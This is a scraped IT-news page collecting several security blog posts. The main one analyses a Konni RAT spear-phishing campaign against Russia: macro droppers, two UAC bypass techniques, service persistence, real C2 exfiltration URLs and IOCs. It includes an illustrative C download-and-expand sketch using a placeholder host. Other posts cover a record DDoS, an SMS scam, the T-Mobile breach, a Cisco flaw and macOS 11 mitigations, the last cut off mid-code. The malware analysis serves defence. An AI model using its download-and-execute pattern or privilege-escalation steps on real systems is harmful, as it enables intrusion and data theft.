IT News

Explore the MakoLogics IT News for valuable insights and thought leadership on industry best practices in managed IT services and enterprise security updates.

New variant of Konni malware used in campaign targeting Russia

This blog post was authored by Hossein Jazi

In late July 2021, we identified an ongoing spear phishing campaign pushing the Konni RAT to target Russia. Konni was first observed in the wild in 2014 and has been tentatively linked to the North Korean APT group APT37.

We discovered two documents written in Russian and weaponized with the same malicious macro. One of the lures concerns trade and economic issues between Russia and the Korean Peninsula. The other is about a meeting of the intergovernmental Russian-Mongolian commission.

In this blog post we provide an overview of this campaign, which uses two different UAC bypass techniques and clever obfuscation tricks to stay under the radar.

Attack overview

The following diagram shows the overall flow used by this actor to compromise victims. The malicious activity starts from a document that executes a macro followed by a chain of activities that finally deploys the Konni Rat.

Figure 1: Overall Process

Document analysis

We found two lures used by Konni APT. The first document, “Economic relations.doc”, contains a 12-page article that seems to have been published in 2010 under the title “The regional economic contacts of Far East Russia with Korean States (2010s)“. The second document is the outline of a meeting happening in Russia in 2021: “23th meeting of the intergovernmental Russian-Mongolian commission on Trade, Economic, scientific and technical operation“.

Figure 2: Lures used by Konni APT

These malicious documents used by Konni APT have been weaponized with the same simple but clever macro. It just uses a Shell function to execute a one-liner cmd command. This one-liner takes the current active document as input, looks for the "^var" string using findstr, and writes the content of the line starting from “var” into y.js. At the end it calls the WScript Shell function to execute the JavaScript file (y.js).

The clever part is that the actor hid the malicious JavaScript, which kicks off the main activity, at the end of the document content rather than putting it directly into the macro, both to avoid detection by AV products and to hide its main intent from them.

Figure 3: Macro

The y.js file is called with the active document as its argument. This JavaScript looks for two patterns encoded within the active document; for each pattern it first writes the content starting from the pattern into a temp.txt file, then base64-decodes it using its built-in decoder function, de(input), and finally writes the decoded content to the defined output.

yy.js is used to store the first decoded content and y.ps1 the second. After the output files are created, they are executed using WScript and PowerShell.

Figure 4: y.js

The PowerShell script (y.ps1) uses DllImport to import URLDownloadToFile from urlmon.dll and WinExec from kernel32.dll. After importing the required functions it defines the following variables:

  • The URL to download a file from
  • Directory to store the downloaded file (%APPDATA%/Temp)
  • Name of the downloaded file that will be stored on disk.

In the next step it calls URLDownloadToFile to download a cabinet file and stores it in the %APPDATA%\Temp directory under a unique random name created by GetTempFileName. It then uses WinExec to run a cmd command that calls expand to extract the content of the cabinet file and deletes the cabinet file. Finally, y.ps1 is itself deleted, again via WinExec.
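
For readers less familiar with these APIs, the sketch below shows, in plain C, roughly what this download-and-expand pattern looks like when URLDownloadToFile and WinExec are called directly. It is only an illustration of the API pattern that the script reproduces through DllImport, not the actor's code, and the URL is a placeholder.

#include <windows.h>
#include <urlmon.h>   /* URLDownloadToFileA; link with urlmon.lib */
#include <stdio.h>

int main(void)
{
    char dir[MAX_PATH], cab[MAX_PATH], cmd[4 * MAX_PATH];

    /* Build a unique temporary file name, much as GetTempFileName is used by y.ps1 */
    GetTempPathA(MAX_PATH, dir);
    GetTempFileNameA(dir, "tmp", 0, cab);

    /* Download a cabinet file to the temporary path (placeholder URL, not the real infrastructure) */
    if (URLDownloadToFileA(NULL, "http://example.invalid/payload.cab", cab, 0, NULL) != S_OK)
        return 1;

    /* Expand the cabinet into the temp directory, then delete the cabinet itself */
    snprintf(cmd, sizeof(cmd), "cmd /c expand \"%s\" -F:* \"%s\" & del \"%s\"", cab, dir, cab);
    WinExec(cmd, SW_HIDE);
    return 0;
}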

Figure 5: y.ps1

The extracted cabinet file contains five files: check.bat, install.bat, xmlprov.dll, xmlprov.ini and xwtpui.dll. yy.js is responsible for executing the check.bat file extracted from the cabinet and for deleting itself at the end.

Figure 6: yy.js

Check.bat

This batch file checks whether the command prompt was launched as administrator using net session > nul and, if so, executes install.bat. If the user does not have administrator privileges, it checks the OS version: if it is Windows 10 it sets a variable named num to 4, otherwise it sets it to 1. It then executes xwtpui.dll using rundll32.exe, passing three parameters to it: EntryPoint (the export function of the DLL to be executed), num (the number that indicates the OS version) and install.bat.

Figure 7: check.bat

Install.bat

The malware used by the attacker pretends to be the xmlprov Network Provisioning Service. This service manages XML configuration files on a domain basis for automatic network provisioning.
Install.bat is responsible for installing xmlprov.dll as a service. To achieve this goal, it performs the following actions:

  • Stop the running xmlprov service
  • Copy the dropped xmlprov.dll and xmlprov.ini into the system32 directory and delete them from the current directory
  • Check if xmlProv service is installed or not and if it is not installed create the service through svchost.exe
  • Modify the xmlProv service values including type and binpath
  • Add xmlProv to the list of the services to be loaded by svchost
  • Add xmlProv to the xmlProv registry key
  • Start the xmlProv service
Figure 8: Install.bat

xwtpui.dll

As we mentioned earlier, if the victim’s machine does not have the right privileges, xwtpui.dll is called to run install.bat. Since install.bat creates a service, it needs to run at a high integrity level; xwtpui.dll is used to bypass UAC, obtain that privilege, and then launch install.bat.

EntryPoint is the main export function of this DLL. It starts its activities by resolving API calls. All the API call names are hard-coded and the actor has not used any obfuscation techniques to hide them.

Figure 9: EntryPoint

In the next step, it checks the privilege level by calling the Check_Priviledge_Level function. This function performs the following actions and returns zero if the user does not have the right privilege or UAC is not disabled.

  • Call RtlQueryElevationFlags to get the elevation state by checking the PFlags value. If it is set to zero, UAC is disabled.
  • Get the access token associated with the current process using NtOpenProcessToken, then call NtQueryInformationToken to get the TokenElevationType and check whether its value is 3 (if the value is not 3, the current process is elevated; see the sketch after this list). The TokenElevationType can have three values:
    • TokenElevationTypeDefault (1): Indicates that UAC is disabled.
    • TokenElevationTypeFull (2): Indicates that the current process is running elevated.
    • TokenElevationTypeLimited (3): Indicates that the process is not running elevated.
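
As a rough illustration of the second check, this is what querying TokenElevationType looks like with the documented Win32 wrappers; the malware calls the lower-level Nt* functions directly, so treat this as a sketch of the logic rather than the actor's code.

#include <windows.h>
#include <stdio.h>

int main(void)
{
    HANDLE token = NULL;
    TOKEN_ELEVATION_TYPE type;
    DWORD len = 0;

    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &token))
        return 1;

    /* TokenElevationTypeLimited (3) means the process runs with a filtered, non-elevated token */
    if (GetTokenInformation(token, TokenElevationType, &type, sizeof(type), &len))
        printf("TokenElevationType = %d (%s)\n", (int)type,
               type == TokenElevationTypeLimited ? "not elevated" : "elevated or UAC not in effect");

    CloseHandle(token);
    return 0;
}
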
Figure 10: Check privilege level

After checking the privilege level, it checks the parameter passed from check.bat that indicates the OS version. If the OS version is Windows 10, it uses a combination of a modified version of the RPC UAC bypass reported by Google Project Zero and Parent PID Spoofing, while for other Windows versions it uses the “Token Impersonation” technique to bypass UAC.

Token Impersonation UAC Bypass (Cavalry UAC Bypass)

Cavalry is a token impersonation/theft privilege escalation technique that impersonates the token of the Windows Update Standalone Installer process (wusa.exe) to spawn cmd.exe with the highest privileges and execute install.bat. This technique is part of the leaked US CIA toolset known as Vault7.

The actor used this method in its 2019 campaign as well. This UAC bypass starts by executing wusa.exe using ShellExecuteExW and getting its access token using NtOpenProcessToken. The access token of wusa.exe is then duplicated using NtDuplicateToken. The DesiredAccess parameter of this function specifies the requested access rights for the new token; in this case the actor passed TOKEN_ALL_ACCESS, which means the new token gets the combination of all access rights of the current token. The duplicated token is passed to ImpersonateLoggedOnUser, and a cmd instance is then spawned using CreateProcessWithLogonW. At the end the duplicated token is assigned to the created thread using NtSetInformationThread to make it elevated.

Figure 11: Cavalry PE

Windows 10 UAC Bypass

The UAC bypass used for Windows 10 combines a modified version of the RPC-based UAC bypass reported by Google Project Zero with Parent PID Spoofing. The process is as follows:

  • Step 1: Creates a string binding for interface ID “201ef99a-7fa0-444c-9399-19ba84f12a1a”, obtains a binding handle from it, and sets the required authentication, authorization and security quality of service information on that handle.
Figure 12: RPC Binding
  • Step 2: Initializes an RPC_ASYNC_STATE to make asynchronous calls and creates a new non-elevated process (it uses winver.exe as the non-elevated process) through NdrAsyncClientCall.
Figure 13: RPC AsyncCall
  • Step 3: Uses NtQueryInformationProcess to open a handle to the debug object by passing the handle of the created process to it. It then detaches the debugger from the process using NtRemoveProcessDebug and terminates the created process using TerminateProcess.
Figure 14: Detach the process
  • Step 4: Repeats steps 1 and 2 to create a new auto-elevated process: Taskmgr.exe.
  • Step 5: Gets full access to the Taskmgr.exe process handle by retrieving its initial debug event. It first issues a wait on the debug object using WaitForDebugEvent to get the initial process creation debug event, then uses NtDuplicateObject to obtain a full-access process handle.
Figure 15: Create Auto elevated process (TaskMgr.exe)
  • Step 6: After obtaining the fully privileged handle of Taskmgr.exe, the actor uses it to execute cmd as a high-privilege process that runs install.bat. To achieve this, the actor uses the Parent PID Spoofing technique: a new cmd process is spawned using CreateProcessW, and the handle of Taskmgr.exe, an auto-elevated process, is assigned as its parent process using UpdateProcThreadAttribute.
Figure 16: Parent PID Spoofing

Xmlprov.dll (Konni Rat)

This is the final payload, deployed as a service using svchost.exe. This RAT is heavily obfuscated and uses multiple anti-analysis techniques. It has a custom section named “qwdfr0” which performs the whole de-obfuscation process. The payload registers itself as a service using its export function ServiceMain.

Figure 17: ServiceMain

Even though this sample is heavily obfuscated, its functionality has not changed much and is similar to the previous version. It seems the actor simply applied heavy obfuscation to hinder security mechanisms. VirusTotal detection of this sample at the time of analysis was 3, which indicates that the actor succeeded in using obfuscation to bypass most AV products.

This RAT has an encrypted configuration file, “xmlprov.ini”, which is loaded and decrypted when the RAT starts. The functionality of this RAT starts by collecting information from the victim’s machine by executing the following commands:

  • cmd /c systeminfo: Collects detailed configuration information about the victim’s machine, including operating system configuration, security information and hardware data (RAM size, disk space and network card info), and stores the collected data in a tmp file.
  • cmd /c tasklist: Collects a list of running processes on the victim’s machine and stores it in a tmp file.

In the next step each of the collected tmp files is converted into a cab file using cmd /c makecab, then encrypted and sent to the attacker’s server in an HTTP POST request (http://taketodjnfnei898.c1.biz/up.php?name=%UserName%).

Figure 18: Upload data to server

After sending data to the server, it enters a loop to receive commands from the server (http://taketodjnfnei898.c1.biz/dn.php?name=%UserName%&prefix=tt). At the time of analysis the server was down and unfortunately we do not have enough information about the next step of this attack. A detailed analysis of this payload will be published in a follow-up blog post.

Campaign Analysis

Konni is a RAT that is potentially used by APT37 to target its victims. The main victims of this RAT are mostly political organizations in Russia and South Korea, but it is not limited to those countries; it has also been observed targeting Japan, Vietnam, Nepal and Mongolia.

Several operations have used this RAT, but the campaigns reported by ESTsecurity and CyberInt in 2019 and 2020 in particular are similar to what we report here. In those campaigns the actor used Russian-language lures to target Russia. There are several differences between the actor’s past campaigns and what we documented here, but the main process is the same: in all the campaigns the actor uses macro-weaponized documents to download a cab file and deploy the Konni RAT as a service.

Here are some of the major differences between this new campaign and the older ones:

  • The macros are different. In the old campaign the actor used TextBoxes to store its data while in the new one the content has been base64 encoded within the document content.
  • In the new campaign JavaScript files have been used to execute batch and PowerShell files.
  • The new campaign uses PowerShell and URLMON API calls to download the cab file, while the old campaign used certutil to download it.
  • The new campaign has used two different UAC bypass techniques based on the victim’s OS while in the old one the actor only used the Token Impersonation technique.
  • In the new campaign the actor has developed a new variant of Konni RAT that is heavily obfuscated. Also, its configuration is encrypted and is not base64 encoded anymore. It also does not use FTP for exfiltration.

Malwarebytes customers are protected against this campaign.


IOCs

Name SHA256
N/A fccad2fea7371ad24a1256b78165bceffc5d01a850f6e2ff576a2d8801ef94fa
economics relations.doc d283a0d5cfed4d212cd76497920cf820472c5f138fd061f25e3cddf65190283f
y.js 7f82540a6b3fc81d581450dbdf7dec7ad45d2984d3799084b29150ba91c004fd
yy.js 7a8f0690cb0eb7cbe72ddc9715b1527f33cec7497dcd2a1010def69e75c46586
y.ps1 617f733c05b42048c0399ceea50d6e342a4935344bad85bba2f8215937bc0b83
tmpBD2B.tmp 10109e69d1fb2fe8f801c3588f829e020f1f29c4638fad5394c1033bc298fd3f
check.bat a7d5f7a14e36920413e743932f26e624573bbb0f431c594fb71d87a252c8d90d
install.bat 4876a41ca8919c4ff58ffb4b4df54202d82804fd85d0010669c7cb4f369c12c3
xwtpui.dll 062aa6a968090cf6fd98e1ac8612dd4985bf9b29e13d60eba8f24e5a706f8311
xmlprov.dll f702dfddbc5b4f1d5a5a9db0a2c013900d30515e69a09420a7c3f6eaac901b12
xmlprov.dll 80641207b659931d5e3cad7ad5e3e653a27162c66b35b9ae9019d5e19e092362
xmlprov.ini 491ed46847e30b9765a7ec5ff08d9acb8601698019002be0b38becce477e12f6

Domains:
takemetoyouheart[.]c1[.]biz
taketodjnfnei898[.]ueuo[.]com
taketodjnfnei898[.]c1[.]biz
romanovawillkillyou[.]c1[.]biz

The post New variant of Konni malware used in campaign targeting Russia appeared first on Malwarebytes Labs.

Largest DDoS attack ever reported gets hoovered up by Cloudflare

On the Cloudflare blog, the American web infrastructure behemoth that provides content delivery network (CDN) and DDoS mitigation services reports that it detected and mitigated a 17.2 million request-per-second (rps) DDoS attack. To put that number in perspective: the company reports that this is three times as large as anything it has seen before.

DDoS

In a DDoS attack, an attacker tries to stop people from using a service by making it so busy it either crashes or grinds to a halt. It does this by flooding the service with spurious requests from multiple, distributed locations.

If hacking is opening a door by picking its lock, then DDoS is blocking the door by boarding it up from the outside.

The target

The target of this enormous DDoS attack was a Cloudflare customer in the financial sector. Cloudflare reports that within seconds, the botnet bombarded its edge with over 330 million requests.

For Internet devices, the network edge is where the device, or the local network containing the device, communicates with the Internet. The “edge” in this case refers to the Cloudflare CDN, which customers use to improve the performance of their websites. CDNs are geographically dispersed clusters of servers that store web content. When users try to access a website that uses a CDN, they actually get directed to the nearest CDN server rather than the website itself, and Cloudflare handles the web traffic. Similarly, if somebody tries to DDoS attack the website, the attack ends up hitting the Cloudflare CDN.

The Cloudflare CDN is absolutely enormous, and is used by almost 20% of all websites, which means it can handle an absolutely enormous amount of traffic.

The botnet

The attack traffic is reported to have originated from more than 20,000 bots in 125 countries around the world. Based on the bots’ source IP addresses, almost 15% of the attack originated from Indonesia and another 17% from India and Brazil combined. Cloudflare attributes this attack to the Mirai botnet. Although the number of Mirai bots is on the decline, the botnet was still able to generate impressive volumes of attack traffic for short periods.

You may remember hearing about this botnet after the massive East Coast internet outage of 2016 when the Mirai botnet was leveraged in a DDoS attack aimed at Dyn, an Internet infrastructure company. Traffic to Dyn’s Internet directory servers throughout the US—primarily on the East Coast but later on the opposite end of the country as well—was stopped by a flood of malicious requests from tens of millions of IP addresses disrupting the system.

Although it hasn’t generated headlines like that for a few years, we recently posted about how Mirai was trying to add a host of home routers to its collection of compromised devices. It was found hijacking routers using a vulnerability that was disclosed only two days earlier.

As it happens, Microsoft wrote about the Mozi botnet, which is essentially a Mirai variant, going after Netgear, Huawei, and ZTE gateways by using clever persistence techniques that are specifically adapted to each gateway’s particular architecture. Last year, security experts from IBM X-Force said that the Mozi botnet accounted for 90 percent of traffic from IoT devices at that time.

Vulnerabilities

Mirai works by harnessing tens of thousands of small, low-powered Internet-of-Things (IoT) devices, such as Internet-connected cameras and home routers. Although each device it compromises only adds a little horsepower to Mirai’s engine, there are plenty of them to hijack.

Vulnerabilities in home networking equipment often go unpatched for long periods, since most home users are unaware that such vulnerabilities exist and many lack the skills and/or confidence to apply a patch if one is made available.

Almost the same can be said about many small and medium-sized businesses. As long as the equipment works, many fail to see the need for patching or for replacing vulnerable devices. In some cases patches are not even made available once devices have been replaced by newer models, or vendors fail to inform users that the vulnerability exists in the first place.

Mitigation

When it comes to blocking DDoS attacks there is not much businesses can do, except hire specialized help. But there are some things you can do so you do not become part of the problem.

Businesses and consumers alike should also start worrying about securing their IoT devices so that they can’t be used in a DDoS botnet. We have an excellent article called Internet of Things (IoT) security: what is and what should never be that explains in detail why and how you can make the IoT a safer place.

And maybe, just maybe, we should try and work out Internet protocols that are designed so that they do not offer opportunities for DDoS attacks.

The post Largest DDoS attack ever reported gets hoovered up by Cloudflare appeared first on Malwarebytes Labs.

Beware of COVID Pass scams

You’ve likely seen fake parcel delivery texts in the news recently, and we’ve covered a few of these ourselves. SMS missives claim a package is waiting to be delivered, and a small processing fee is required. There is no package; it’s a ruse to have people hand over their credit card details. It’s been wildly successful during lockdown, at a time when many are having to order almost everything they can online.

This isn’t the only bogus SMS message doing the rounds, however. COVID-19 is proving to be a crucial piece of bait for this kind of tactic, as we’ll see below.

The road to a (non-existent) COVID Pass

This attack is aimed at residents of the UK. It makes use of social engineering in a similar fashion to other pandemic-themed SMS texts, with a strong psychological aspect tied in for good measure.

This one works as follows:

  1. SMS messages are sent to unsuspecting individuals.
  2. The linked site is HTTPS, to give that added sheen of “this is the real website, because it’s got a padlock”. Hopefully you know that a padlock does not mean you can trust a website; many don’t.
  3. The site design imitates the usual look and feel of NHS websites, specifically those related to COVID-19. Here’s an example of the real thing.
  4. The scammers ask for a lot of details across multiple pages, beginning with “the exact name used when you registered with your GP surgery”. From there, they ask for date of birth, post code, and an address where they can deliver “your Covid pass credentials to be registered on our NHS app”. After this, they request “a payment of £4.99 to process your Covid Pass application”.
Fake “Covid Pass” site
Fake “Covid Pass” site asking for payment details

This doesn’t get a free pass to your bank account

It’s important to note that the UK does have an actual Covid Pass system. There’s a proper process in place, and it doesn’t involve handing money over to random websites. It’s also worth noting there have been a number of other scams along these same lines.

Should you receive one of these text messages, you can safely ignore it and report it as spam while you’re at it.

The post Beware of COVID Pass scams appeared first on Malwarebytes Labs.

T-Mobile customers, change your PINs

At the end of last week, T-Mobile was investigating reports of a “massive” customer data breach. A hacker claimed to have stolen 100 million people’s data from T-Mobile’s servers, including everything from names and driver’s licences to addresses and social security numbers.

It’s now confirmed that something bad did take place. The current estimate is “at least” 47 million affected people, with around 7.8 million current postpaid customers impacted. The most pressing issue is that of prepaid account customers’ PINs.

PIN compromise

Roughly 850k active prepaid accounts had their account PINs exposed, along with names and phone numbers. These PINs are used to help identify the account owner on customer service phone calls. If a scammer knows your PIN, they can potentially perform a SIM swap attack, giving them control of your mobile number, SMS messages, SMS 2FA… Gaining control of a mobile device isn’t far off having the keys to someone’s digital kingdom.

What to do?

T-Mobile have outlined the situation thus far, along with some pieces of advice for anybody worried by recent events.

The priority has to be the PIN codes. The company recommends ALL postpaid customers change their PIN to a new one, not just the 850k people known to be affected, just in case. This is because they currently have no evidence that postpaid PINs have been taken, but better safe than sorry.

They also recommend postpaid customers sign up to their Account Takeover Protection service to make things even harder for would-be hijackers. We note that T-Mobile also has a biometric verification feature, which can replace the problem of compromised PINs altogether. With a bit of luck, these proactive steps will help ease the concerns of anyone affected by this breach.

Even so, there’s a few more things to be wary of on the horizon.

What’s next?

Any time a breach occurs, a key concern has to be phishing and social engineering. Personal information is a goldmine for people who are up to no good. Customers should brace themselves for criminals taking advantage of the situation with a wave of fresh phish served up…now with more personalisation than ever before.

Anyone affected by a data breach before—and that’s a lot of us—will be familiar with the credit score dance that comes after. T-Mobile is offering “2 years of free identity protection services”, and recently published a dedicated breach page.

From there, people can see an easy-to-digest slice of information which:

  • Explains what happened, details compromised data, and mentions their next steps.
  • Clearly advises what customers can do next, including a variety of security steps and a few additional resources related to credit score / monitoring / related services.
  • Lists a contact number for support calls, which is something that can easily go missing on a page like this.

All in all, not a great situation for anybody to be in. However, T-Mobile have done a good job of rounding up the details and making it obvious what people should do next. This hasn’t always been the case with major breaches in the past, and one hopes this can continue the next time something bad happens. That one-stop-shop page will almost certainly be updated should fresh information emerge, so T-Mobile customers would be wise to bookmark it for the coming weeks or months.

The post T-Mobile customers, change your PINs appeared first on Malwarebytes Labs.

Cisco Small Business routers vulnerable to remote attacks, won’t get a patch

In a security advisory, Cisco has informed users that a vulnerability in the Universal Plug-and-Play (UPnP) service of Cisco Small Business RV110W, RV130, RV130W, and RV215W routers could allow an unauthenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly, resulting in a denial of service (DoS) condition.

Normally we’d say “patch now”, but you can’t, and you’ll never be able to because a patch isn’t coming.

CVE-2021-34730

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). This vulnerability is listed under CVE-2021-34730. As a result of improper validation of incoming UPnP traffic an attacker could exploit this vulnerability by sending a crafted UPnP request to an affected device.

A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system, or cause the device to reload, resulting in a DoS condition. “Executing arbitrary code as the root user” is tantamount to “do whatever they like”, which is bad. A CVSS score of 9.8 out of 10 bad. (CVSS can help security teams and developers prioritize threats and allocate resources effectively.)

UPnP

Universal Plug and Play (UPnP) is a set of networking protocols that permit networked devices, like routers, to seamlessly discover each other’s presence on a network and establish functional network services.

From that description alone it should be clear that, from a security point of view, this protocol has no place on an Internet-facing device. Once you have set up the connections to your internal devices, there is no reason to leave UPnP enabled. There are plenty of reasons to disable it.

A lot of the problems associated with UPnP-based threats can be linked back to security issues during implementation. Router manufacturers historically have not been very good at securing their UPnP implementations, which often leads to the router not checking input properly. Which is exactly what happened here. Again.

And then there are vulnerabilities in UPnP itself. The most famous one probably is CallStranger, which was caused by the Callback header value in UPnP’s SUBSCRIBE function that can be controlled by an attacker and enables a vulnerability which affected millions of Internet-facing devices.

That particular vulnerability should have been patched by most vendors by now by the way. But CVE-2021-34730 won’t be, here’s why…

No patch

The affected routers have entered the end-of-life process and so Cisco has not released software updates to fix the problem. According to the security advisory, it seems they have no plans to do so either:

“Cisco has not released and will not release software updates to address the vulnerability described in this advisory.” Cisco also says it is not aware of any malicious use of the vulnerability.

Since there are no workarounds that address this vulnerability, the only choice that administrators have is to disable the affected feature (UPnP). Or buy a new router. Since the routers won’t receive any updates for issues in future either, we suggest you do both: Disable UPnP now, and buy a new router soon.

Mitigation

For owners of the affected routers it is particularly important to check that UPnP is disabled both on the WAN and the LAN interface. The WAN interface is set to off by default but that doesn’t mean it hasn’t been changed since. The LAN interface is set to on by default and needs to be turned off. Cisco advises that to disable UPnP on the LAN interface of a device, you do the following:

  • Open the web-based management interface and choose Basic Settings > UPnP.
  • Check the Disable check box.

It is important to disable UPnP on both interfaces because that is the only way to eliminate the vulnerability.

Stay safe, everyone!

The post Cisco Small Business routers vulnerable to remote attacks, won’t get a patch appeared first on Malwarebytes Labs.

macOS 11’s hidden security improvements

A deep dive into macOS 11’s internals reveals some security surprises that deserve to be more widely known.

Contents

  1. Introduction
    1. Disclaimers
  2. macOS 11’s better known security improvements
    1. Secret messages revealed?
  3. CPU security mitigation APIs
    1. The NO_SMT mitigation
    2. The TECS mitigation
    3. Who benefits from NO_SMT and TECS?
  4. Endpoint Security API improvements
    1. More message types
    2. More notifications, less polling
    3. More metadata
    4. Improved performance
  5. A vulnerability quietly fixed
  6. O_NOFOLLOW_ANY
  7. Conclusion
  8. Endnotes

Introduction

When a new release of an operating system comes out, normal people find out what’s new by attending developer conferences, reading release notes, changelogs, reviews.

Me, I download the software development kit (SDK) for the new version, and diff it with the current version.

This is not uncommon on, say, Windows: There are entire websites dedicated to large scale, long term, differential reverse engineering, that tell you what new functions appeared in what version of Windows, how their relationship with other functions has changed, how internal data structures have evolved etc. On macOS, nobody seems to do it (at least not in public), and something as simple as diffing the includes from one SDK version to the next and patiently going through it, file by file, can reveal interesting features nobody knows (or at least talks) about.

Comparing the macOS 11 and macOS 10.15 SDKs, I found several intriguing surprises that deserve to be more widely known.

Disclaimers

In this article, I describe poorly-documented, or completely undocumented, features that could stop working as advertised or disappear completely without notice in future releases of macOS. Use common sense, assess the risks, choose, and take responsibility for your choice.

Note that I’m just a developer, neither a security researcher nor an exploit writer, and my descriptions of security issues and their mitigations might fall between “slightly incorrect” and “completely wrong”. I welcome corrections.

macOS 11’s better known security improvements

At the WWDC 2020, Apple made a big deal of several new macOS and iOS features that were, in fact, big deals. This article was supposed to come out much earlier, and I don’t expect anyone still remembers what the fuss was about over a year later, so I’ll give you a brief recap.

The major new security features that would debut in macOS 11 were:

  • Pointer Authentication Codes (PAC), hardware-enforced Call Flow Integrity (CFI), implemented by Apple’s homegrown 64 bit ARM processor, the M1. Currently limited to system code and kernel extensions, but open to all third-party developers for experimentation.
  • Device isolation was another M1-only feature, that uses the more powerful IOMMU of that platform to make sure hardware devices can only share memory with the operating system and not with each other. Cross-device memory sharing is a historical custom, based on a blind, unfounded trust in hardware.
  • Write XOR Execute (W^X) finally came to macOS, in a hardware-enforced form (yes, another M1-only feature). Memory pages can now be either writable or executable, never both at the same time; no exceptions. Just-in-time (JIT) compilers will need to be redesigned around this limitation to run on ARM Macs, but special APIs are provided to make the work easier.
  • Signed System Volume (SSV) cryptographically sealed the boot volume and made it tamper-evident. (macOS has booted from a read-only volume since 10.15.) Apple’s Protecting data at multiple layers article briefly describes SSV, but Howard Oakley has an even more detailed write-up on his blog, with illustrations; a must-read. You should also check out Andrew Cunningham’s review of macOS 11.

These technologies have justly earned the attention of the press and security researchers, and they’ve been discussed in great detail elsewhere. (The Apple video Explore the new system architecture of Apple silicon Macs from session 10686 of the WWDC 2020 has a good overview of most of the new security features, and more.)

There’s really nothing I could add to what the excellent resources out there say about these topics, but there are other security improvements that everyone seems to have missed, and that Apple seems to be shy about.

Secret messages revealed?

On second thoughts, maybe my rummaging approach can add something novel (although incredibly trivial) to the publicly-disclosed security improvements: I’ve not seen anybody mention the fact that the cryptographically sealed filesystem underlying SSV is internally code-named “Cryptex”. The cryptex(5) man page claims that: “The name ‘cryptex’ is a portmanteau for ‘CRYPTographically-sealed EXtension’.”

… but I know, we know, they know that they took the name from Dan Brown’s best-selling, award-winning birdcage liner The Da Vinci Code. The otherwise forgettable (and best-forgotten) airport thriller introduced the intriguing concept of a cryptex: a secret message, sealed by a combination lock, that would self-destruct if opened by force.

There are intriguing hints in cryptex(5) that suggest a wider Cryptex Cinematic Universe, like references to a cryptexctl(1) command and a cryptexd(8) daemon, but those man pages are nowhere to be found, nor are the two binaries part of macOS. A placeholder man page for libcryptex(3) has literally nothing to say about the “Cryptex management library”, except an interesting detail: A copyright date of 19 October, 2018, suggesting that SSV had been in development for a long time before materializing as an end user feature.

The SDK includes the import libraries for libcryptex, libcryptex_core and libcryptex_interface, but not the libraries themselves, so we have the lists of exported symbols but not the code behind them. The libraries, too, are not part of macOS, which makes me think that the scattered Cryptex artefacts found in the SDK probably escaped, no idea how, from an Apple private code corral.

All that the symbol lists can tell us is that the politically correct “CRYPTographically-sealed EXtension” revisionism can be put to rest: To me, functions with names like codex_install_pack (exported by libcryptex_interface) unquestionably prove a Brownian origin of the name!

CPU security mitigation APIs

Developers are taught to think of the CPU as a perfect, mathematical abstraction. In 2018, year of microarchitectural vulnerabilities (Spectre and Meltdown to name the most infamous ones), we were set straight: CPUs run on code; CPU developers weren’t preternaturally capable of writing multithreaded code without race conditions; and the CPUs they made were buggy, unreliable and traitorous, conspiring with applications against the operating system (OS) to bypass access controls in undetectable ways.

The issues that could be fixed were fixed. The remaining issues could only be mitigated, either in the OS or the compiler, at the cost of performance. I was aware of the mitigations rolled out by Microsoft as Windows updates, the new MSVC compiler option /Qspectre, the changes to the Chrome JIT compiler to prevent it from generating exploitable code from malicious Javascript, etc.

But, I was surprised to discover new, unannounced, completely undocumented mitigations in macOS 11.

As far as I can tell, this is the first public article ever written that describes them. The new APIs return virtually no hits in grep.app or GitHub code search—or Google, for that matter.

Two kinds of mitigations are provided, codenamed NO_SMT and TECS. Let’s have a closer look at them.

The NO_SMT mitigation

What is it?

NO_SMT disables Simultaneous multithreading (SMT), the CPU feature better known under Intel’s trade name of “Hyper-Threading”. SMT allows a CPU core to execute two or more threads at the same time, for improved performance at the cost of contention for per-core resources, such as caches, TLBs etc.

Letting multiple threads share invisible resources carries the risk of letting a malicious thread steal secrets from a “sibling” thread running on the same core—a risk that over the years has materialized into multiple attacks, like TLBleed, PortSmash, Fallout, ZombieLoad, RIDL. A straightforward mitigation for this entire family of attacks, past and future, is then to simply disable SMT, which is what NO_SMT does.

How to use NO_SMT

In C/C++, #include <libproc.h>; no extra library necessary. From <libproc.h>:

/*
 * NO_SMT means that on an SMT CPU, this thread must be scheduled alone,
 * with the paired CPU idle.
 *
 * Set NO_SMT on the current proc (all existing and future threads)
 * This attribute is inherited on fork and exec
 */
int proc_set_no_smt(void) __API_AVAILABLE(macos(11.0));

/* Set NO_SMT on the current thread */
int proc_setthread_no_smt(void) __API_AVAILABLE(macos(11.0));

Simply call proc_set_no_smt to enable NO_SMT for the entire process (existing and future threads alike), or proc_setthread_no_smt to enable it for the calling thread only. Like the comments say, fork(2) children inherit the parent process’s NO_SMT state, and exec(2) won’t reset it.
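
For example, a process that handles secrets could opt in at startup. A minimal sketch (the error-handling convention of these wrappers isn't documented, so the check below is a guess):

#include <libproc.h>
#include <stdio.h>

int main(void)
{
    /* Opt the whole process (and any future children) out of sharing a core via SMT */
    int rc = proc_set_no_smt();
    if (rc != 0)
        fprintf(stderr, "proc_set_no_smt failed (%d); continuing without the mitigation\n", rc);

    /* ... security-sensitive work ... */
    return 0;
}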

Note that “libproc” is a misnomer, and these aren’t library functions but thin C wrappers over the private system call process_policy(2).

NO_SMT also extends posix_spawn(2), so that we can enable mitigations for a new process without setting them for the current process, or spawning a short-lived fork(2) child (ideally, we should never call fork(2) again in any new code, on any OS. Ever). From <spawn.h>:

int     posix_spawnattr_setnosmt_np(const posix_spawnattr_t * __restrict attr) __API_AVAILABLE(macos(11.0));

posix_spawnattr_setnosmt_np(3) performs the equivalent of proc_set_no_smt on the new process. In the name of the function, the “_np” suffix stands for “non-portable”: A customary way to mark OS-specific extensions to posix_spawn(2).

“But I already use fork(2) and I can’t stop using it! How do I enable NO_SMT after exec(2) without enabling them for the fork child?” You’re in luck, because macOS has you covered: Any posix_spawn(2) feature is automatically available to exec(2) thanks to non-standard flag POSIX_SPAWN_SETEXEC, that can be set on a posix_spawnattr_t using posix_spawnattr_setflags(3), and makes posix_spawn(2) behave like exec(2), replacing the current process instead of creating a new one.
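
Putting the two pieces together, an “exec with NO_SMT” might look like the following sketch (/usr/bin/true is just a placeholder target):

#include <spawn.h>
#include <stdio.h>
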